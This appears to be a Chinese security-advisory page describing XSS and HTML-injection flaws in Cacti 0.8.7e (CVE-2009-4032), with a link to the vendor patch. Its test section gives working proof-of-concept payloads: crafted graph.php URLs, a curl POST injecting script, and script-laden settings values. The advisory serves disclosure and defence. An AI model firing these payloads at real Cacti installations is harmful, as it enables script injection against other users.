安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Cacti多个跨站脚本和HTML注入漏洞
发布日期:
2009-11-21
更新日期:
2009-11-27
受影响系统:
Cacti Cacti 0.8.7e
描述:
BUGTRAQ ID:
37109
CVE(CAN) ID:
CVE-2009-4032
Cacti是一款轮循数据库(RRD)工具,可帮助从数据库信息创建图形,有多个Linux版本。
Cacti没有正确地过滤用户提交给graph_settings.php页面的title_size、legend_size、axis_size和unit_size参数,提交给data_input.php页面的name参数,以及其他一些页面的多个参数,远程攻击者可以通过提交HTTP POST请求执行跨站脚本攻击;此外如果用户拥有通过graph_settings.php修改图形显示设置的权限,就可以通过page_refresh和default_dual_pane_width参数注入javascript。
<*来源:Moritz Naumann
链接:
http://marc.info/?l=full-disclosure&m=125921452816513&w=2
http://secunia.com/advisories/37481/
http://secunia.com/advisories/37484/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27
http://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E
> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' '
http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true'
> poc.html
将page_refresh设置为:
300'><script>alert(3)</script><x y='
将default_dual_pane_width设置为:
200"><script>alert(3)</script><x y="
建议:
厂商补丁:
Cacti
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch
浏览次数:
2318
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客